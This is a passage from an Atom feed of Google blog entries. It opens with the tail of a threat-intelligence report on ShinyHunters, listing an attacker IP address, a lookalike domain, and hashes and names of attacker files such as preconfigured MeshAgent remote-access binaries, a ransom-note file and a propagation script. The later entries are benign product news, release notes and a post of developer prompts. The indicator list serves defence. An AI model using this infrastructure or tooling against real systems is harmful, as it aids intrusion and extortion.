&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.190&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;azurenetfiles.net&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Staging Payloads &amp;amp; Attacker Files&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;File Path / Name&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Indicator Type&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Value / Hash (SHA-256)&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;.bash_history&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File Hash&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Attacker command history&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent64-azure-ops.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File Hash&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-configured Windows agent&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent64-v2.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File Hash&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-configured Windows agent&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent32-azure-ops.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File Hash&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-configured Windows agent&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File Hash&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unconfigured Linux agent&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Filename&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defacement / extortion marker&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;N/A&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;[victim_abbreviation]_fanout.sh&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Filename&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Propagation script&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;N/A&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-11T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/marketingplatform/360/walmart-connect/</id>
    <title>We’re bringing Walmart Connect to Display &amp; Video 360.</title>
    <updated>2026-06-11T12:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/heroimagenoarrownoborder.max-600x600.format-webp.webp" /&gt;The new partnership will help brands reach high-intent shoppers through YouTube campaigns and measure their results.</content>
    <link href="https://blog.google/products/marketingplatform/360/walmart-connect/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-11T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/google-org/skilled-trades/</id>
    <title>Growing the next generation of American workers</title>
    <updated>2026-06-11T09:15:00+00:00</updated>
    <content type="html">A man poses in a hard hat</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/google-org/skilled-trades/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-11T09:15:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/arts-culture/50-new-digital-exhibitions-from-africa-on-google-arts-culture/</id>
    <title>Step inside 50 new digital exhibitions from Africa on Google Arts &amp; Culture</title>
    <updated>2026-06-11T09:00:00+00:00</updated>
    <content type="html">A vibrant digital collage celebrating African culture, history, and modern life.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/arts-culture/50-new-digital-exhibitions-from-africa-on-google-arts-culture/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-11T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_11_2026</id>
    <title>Cloud Release Notes — June 11, 2026</title>
    <updated>2026-06-11T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can &lt;a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist#administer_bigquery"&gt;monitor performance, analyze capacity, and optimize costs with Gemini Cloud Assist in BigQuery&lt;/a&gt;.
This feature is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Support for the
&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-key-drivers"&gt;&lt;code&gt;AI.KEY_DRIVERS&lt;/code&gt; function&lt;/a&gt;
is restored. You can use the
&lt;code&gt;AI.KEY_DRIVERS&lt;/code&gt; function to identify segments of data that cause statistically significant changes to a summable metric.&lt;/p&gt;
&lt;p&gt;This feature is in
&lt;a href="https://cloud.google.com/products/#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cluster Toolkit&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Cluster Toolkit v1.93.0 is available. This release introduces example
blueprints for GKE H4D deployments that use the &lt;a href="https://docs.cloud.google.com/compute/docs/instances/about-flex-start-vms"&gt;flex-start provisioning
model&lt;/a&gt;, a &lt;a href="https://docs.cloud.google.com/compute/docs/instances/placement-policies-overview#about-compact-policies"&gt;compact placement
policy&lt;/a&gt;
and integrated &lt;a href="https://docs.cloud.google.com/tpu/docs/ml-diagnostics/overview"&gt;Google Cloud ML Diagnostics&lt;/a&gt;.
This version also adds a Slurm High Availability controller script and upgrades Slurm
images from Rocky Linux 8 to Rocky Linux 9. For details, see the &lt;a href="https://github.com/GoogleCloudPlatform/cluster-toolkit/discussions/5770"&gt;Release
announcement on
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;In an autoscaled managed instance group (MIG), you can configure the
stabilization period to manage how quickly the autoscaler deletes instances
after a decrease in the load. This configuration can help optimize costs or
maintain extra capacity based on your workload requirements. For more
information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/autoscaler/managing-autoscalers#configure_stabilization_period"&gt;Configure stabilization period&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Data Studio&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Pro feature: Security and compliance enhancements&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The following features are now available to help you meet your organization's security and compliance needs. These features are only available for Data Studio Pro.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href="https://docs.cloud.google.com/data-studio/cmek"&gt;Customer-managed encryption keys (CMEK)&lt;/a&gt;&lt;/strong&gt;:  Use your own cryptographic keys to protect Data Studio Pro assets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href="https://docs.cloud.google.com/data-studio/cms"&gt;Customer-managed storage&lt;/a&gt;&lt;/strong&gt;: Store your file uploads in your own Cloud Storage bucket and your data extracts in your own BigQuery dataset.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href="https://docs.cloud.google.com/data-studio/data-residency"&gt;Data residency&lt;/a&gt;&lt;/strong&gt;: Keep your data physically within a geographical area.&lt;/li&gt;&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google Cloud VMware Engine&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;The VMware Engine &lt;a href="https://docs.cloud.google.com/vmware-engine/docs/concepts/node-types"&gt;&lt;code&gt;ve2&lt;/code&gt; node type&lt;/a&gt; is now available in the following
additional region:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mexico City (&lt;code&gt;northamerica-south1&lt;/code&gt;)&lt;/li&gt;&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps Marketplace&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Siemplify&lt;/strong&gt;: Version 109.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Refactored the code in the following action:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Attach Playbook to Alert&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Knowledge Catalog&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Knowledge Catalog now supports data profile scans for unstructured data
(such as PDFs in Cloud Storage) on existing BigQuery object tables.
This feature uses Vertex AI Gemini models to extract semantic insights,
including entities and relationships, from unstructured content.&lt;/p&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; Data profile scans for unstructured data are currently available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt; using the
Dataplex REST API only. The cloud console and gcloud
workflows are not supported for this feature.&lt;/span&gt;&lt;/aside&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/dataplex/docs/data-insights-unstructured-data"&gt;About unstructured data insights&lt;/a&gt;
and &lt;a href="https://docs.cloud.google.com/dataplex/docs/use-data-profile-unstructured-data"&gt;Use data profile for unstructured data&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_11_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-11T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/10-indispensable-prompts-our-team-refuses-to-build-without/</id>
    <title>10 Indispensable Prompts Our Team Refuses to Build Without</title>
    <updated>2026-06-11T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Look at any builder's prompt history and you'll see a collection of highly specific, sometimes chaotic, one-off prompts. We use AI to debug a single error message, refactor a messy email, or generate a quick boilerplate.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you sit down with people who consistently ship high-quality work, you'll find something interesting. They aren't just improvising. They have a set of go-to prompts they have tweaked and improved over time and used on nearly every project.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I asked some of my peers and leaders a simple question: "What prompt do you use most often, and why?"&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What they shared wasn't just a list of arbitrary commands. Here's the unfiltered look at the prompts our team refuses to ship without, and more importantly, why they use them.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Build a spec&lt;/span&gt;&lt;/h2&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Maja Bilić&lt;/span&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;S&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;enior Outbound Product Manager • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/mbilic/" rel="noopener" target="_blank"&gt;LinkedIn&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Prompt:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;Act as a cynical Principal Architect and Technical PM. I want to build a [product] that allows [user] to do [action]. Do not write code. Analyze this concept and list the top 5 technical, UX and architectural considerations. Then ask me key questions for each of the 5 considerations so we can work together on building the spec. Once you have all the answers, create a PRD doc and implementation plan. Don&amp;#x27;t over engineer or over simplify the design or implementation plan.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d100&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;I have written bad product requirements documentations (PRDs), and I have read many bad PRDs. This prompt ensures I use the persona of a cynical Architect / PM who helps distill the idea, critique the approach and concept, and collaborate on defining the most important pieces. This way I make sure I work through the plan with an agent's help while also developing the product design idea further. I also love the guardrail of not over engineering or over simplifying things; AI tends to do that sometimes, especially when writing product design docs.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Widget t&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ests&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Andrew Brogdon&lt;/strong&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Staff Developer Relations Engineer • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/redbrogdon" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/redbrogdon/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;I&amp;#x27;d like to partner with you on increasing the robustness of this project by creating widget tests. If you haven&amp;#x27;t already, please read the Flutter team&amp;#x27;s skill for creating widget tests (https://github.com/flutter/skills/tree/main/skills/flutter-add-widget-test). Then, let&amp;#x27;s do these things:\r\n\r\n* Examine my application&amp;#x27;s codebase to identify areas of the UI/UX that are not being tested properly.\r\n* Determine if the existing code is written in a testable way (are dependencies injected? Are domains loosely or tightly coupled? Etc.).\r\n* Determine which domains require more rigor than others.\r\n* Create an overall testing plan for the application.\r\n* Determine which areas of functionality are already aligned with that plan, and which are missing tests.\r\n* Create a plan to implement those tests.\r\n* Execute that plan.\r\n\r\nDo not proceed from one step to another unless you are completely confident about your reasoning. You are encouraged to as many questions as needed.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d160&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;My favorite use of agentic coding tools is to actually &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;do&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; all the things I used to feel guilty about not doing in my projects. Proper testing is definitely on that list. The official skills from the Dart/Flutter team do a great job of instructing agents on what good widget tests look like, so combining it with this prompt (which essentially just fits those steps into my own coding workflow) helps me reduce the toil required to maintain reliable, guilt-free codebases.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Find all the tests / Clean-up commit&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Aja Hammerly&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Director of Builder Relations • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/the_thagomizer" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/ajahammerly/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Run all the tests and identify any missing tests and write them. Pay special attention to edge cases and race conditions.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d1c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;Find any unused code, embarrassing comments, comment to code inconsistencies, unresolved TODOs, or other things in this commit that shouldn&amp;#x27;t be in there.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d220&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;I find that when I'm working on code I'll often get extremely focused on the "happy path", the main path I want a user to take through the code. While I'm focused on that I'll put in TODO or FIX comments on edge cases I don't want to think about yet. I'll also forget to update comments and leave debugging comments in sometimes. And while I try to follow test driven development, I don't always get tests in on all the edge cases. I run these two prompts, usually in a new conversation without the development context as a first round of code review before submitting to an AI or human reviewer for the next step. This ensures that what I've built is in good shape for others to review and use. &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Check for correct and compliant permissions&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rich Hyndman&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Head of Antigravity Developer Relations • Engineering &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/geekyouup" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/richardhyndman/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;Run a comprehensive check on this Android project to ensure all permissions are correct and compliant. Perform the following steps:\r\n1. Locate and analyze all &amp;#x27;AndroidManifest.xml&amp;#x27; files (including main, debug, and flavor-specific manifests), extract a master list of declared &amp;lt;uses-permission&amp;gt; tags. \r\n2. Cross-reference these declared permissions against the codebase to verify where they are actually used. Identify any bloatware or unused permissions that can be safely removed.\r\n3. Check the Kotlin/Java source files to ensure that all runtime permissions implement the dynamic runtime permission request flow &amp;#x27;checkSelfPermission&amp;#x27;,&amp;#x27;onRequestPermissionsResult&amp;#x27; or the Activity Result API.\r\n4. Verify that any hardware features associated with the permissions (like android.hardware.camera) are correctly declared. \r\nOutput your findings as a Markdown report. Provide file paths and suggested code diffs for any fixes. Do not make any file edits until I approve the plan.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d280&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
